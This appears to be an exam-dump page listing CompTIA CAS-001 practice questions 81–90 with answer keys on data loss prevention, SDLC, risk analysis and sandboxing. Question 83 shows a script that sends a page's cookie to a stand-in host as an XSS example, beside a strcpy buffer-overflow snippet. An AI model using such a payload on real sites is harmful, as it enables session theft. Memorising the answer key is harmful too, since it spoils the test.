[Free] Download New Latest (November) CompTIA CAS-001 Actual Tests 81-90

Ensurepass

 

QUESTION 81

An internal employee has sold a copy of the production customer database that was being used for upgrade testing to outside parties via HTTP file upload. The Chief Information Officer (CIO) has resigned and the Chief Executive Officer (CEO) has tasked the incoming CIO with putting effective controls in place to help prevent this from occurring again in the future. Which of the following controls is the MOST effective in preventing this threat from re-occurring?

 

A.

Network-based intrusion prevention system

B.

Data loss prevention

C.

Host-based intrusion detection system

D.

Web application firewall

 

Correct Answer: B

 

 

QUESTION 82

Employees have recently requested remote access to corporate email and shared drives. Remote access has never been offered; however, the need to improve productivity and rapidly responding to customer demands means staff now requires remote access. Which of the following controls will BEST protect the corporate network?

 

A.

Develop a security policy that defines remote access requirements. Perform regular audits of user accounts and reviews of system logs.

B.

Secure remote access systems to ensure shared drives are read only and access is provided through a SSL portal. Perform regular audits of user accounts and reviews of system logs.

C.

Plan and develop security policies based on the assumption that external environments have active hostile threats.

D.

Implement a DLP program to log data accessed by users connecting via remote access. Regularly perform user revalidation.

 

Correct Answer: C

 

 

QUESTION 83

Which of the following displays an example of a XSS attack?

 

A.

<SCRIPT>

document.location=’http://site.comptia/cgi-bin/script.cgi?’+document.cookie

</SCRIPT>

B.

Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc

e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz

d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz

ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb

7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb

b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb

C.

<form action=”/cgi-bin/login” method=post>

Username: <input type=text name=username>

PassworD.<input type=password name=password>

<input type=submit value=Login>

D.

#include

char *code = “AAAABBBBCCCCDDD”; //including the character ‘’ size = 16 bytes void main()

{char buf[8];

strcpy(buf, code);

}

 

Correct Answer: A

 

 

QUESTION 84

A newly-appointed risk management director for the IT department at Company XYZ, a major pharmaceutical manufacturer, needs to conduct a risk analysis regarding a new system which the developers plan to bring on-line in three weeks. The director begins by reviewing the thorough and well-written report from the independent contractor who performed a security assessment of the system. The report details what seems to be a manageable volume of infrequently exploited security vulnerabilities. The likelihood of a malicious attacker exploiting one of the vulnerabilities is low; however, the director still has some reservations about approving the system because of which of the following?

 

A.

The resulting impact of even one attack being realized might cripple the company financially.

B.

Government health care regulations for the pharmaceutical industry prevent the director from approving a system with vulnerabilities.

C.

The director is new and is being rushed to approve a project before an adequate assessment has been performed.

D.

The director should be uncomfortable accepting any security vulnerabilities and should find time to correct them before the system is deployed.

 

Correct Answer: A

 

 

QUESTION 85

SDLC is being used for the commissioning of a new platform. To provide an appropriate level of assurance the security requirements that were specified at the project origin need to be carried through to implementation. Which of the following would BEST help to determine if this occurred?

 

A.

Requirements workshop

B.

Security development lifecycle (SDL)

C.

Security requirements traceability matrix (SRTM)

D.

Secure code review and penetration test

 

Correct Answer: C

 

 

QUESTION 86

A web administrator develops a web form for users to respond to the company via a web page. Which of the following should be practiced to avoid a security risk?

 

A.

SQL injection

B.

XSS scripting

C.

Click jacking

D.

Input validation

 

Correct Answer: D

 

 

QUESTION 87

As part of the testing phase in the SDLC, a software developer wants to verify that an application is properly handling user error exceptions. Which of the following is the BEST tool or process for the developer use?

 

A.

SRTM review

B.

Fuzzer

C.

Vulnerability assessment

D.

HTTP interceptor

 

Correct Answer: B

 

 

QUESTION 88

Which of the following refers to programs running in an isolated space to run untested code and prevents the code from making permanent changes to the OS kernel and other data on the host machine?

 

A.

Input Validation

B.

Application hardening

C.

Code signing

D.

Application sandboxing

 

Correct Answer: D

 

 

QUESTION 89

Company Z is merging with Company A to expand its global presence and consumer base. This purchase includes several offices in different countries. To maintain strict internal security and compliance requirements, all employee activity may be monitored and reviewed. Which of the following would be the MOST likely cause for a change in this practice?

 

A.

The excessive time it will take to merge the company’s information systems.

B.

Countries may have different legal or regulatory requirements.

C.

Company A might not have adequate staffing to conduct these reviews.

D.

Th
e companies must consolidate security policies during the merger.

 

Correct Answer: B

 

 

QUESTION 90

A new project initiative involves replacing a legacy core HR system, and is expected to touch many major operational systems in the company. A security administrator is engaged in the project to provide security consulting advice. In addition, there are database, network, application, HR, and transformation management consultants engaged on the project as well. The administrator has established the security requirements. Which of the following is the NEXT logical step?

 

A.

Document the security requirements in an email and move on to the next most urgent task.

B.

Organize for a requirements workshop with the non-technical project members, being the HR and transformation management consultants.

C.

Communicate the security requirements with all stakeholders for discussion and buy-in.

D.

Organize for a requirements workshop with the technical project members, being the databa
se, network, and application consultants.

 

Correct Answer: C

 

Free VCE & PDF File for CompTIA CAS-001 Actual Tests

Instant Access to Free VCE Files: CompTIA | VMware | SAP …
Instant Access to Free PDF Files: CompTIA | VMware | SAP …

This entry was posted in CAS-001 Actual Tests (November) and tagged , , , , , , . Bookmark the permalink.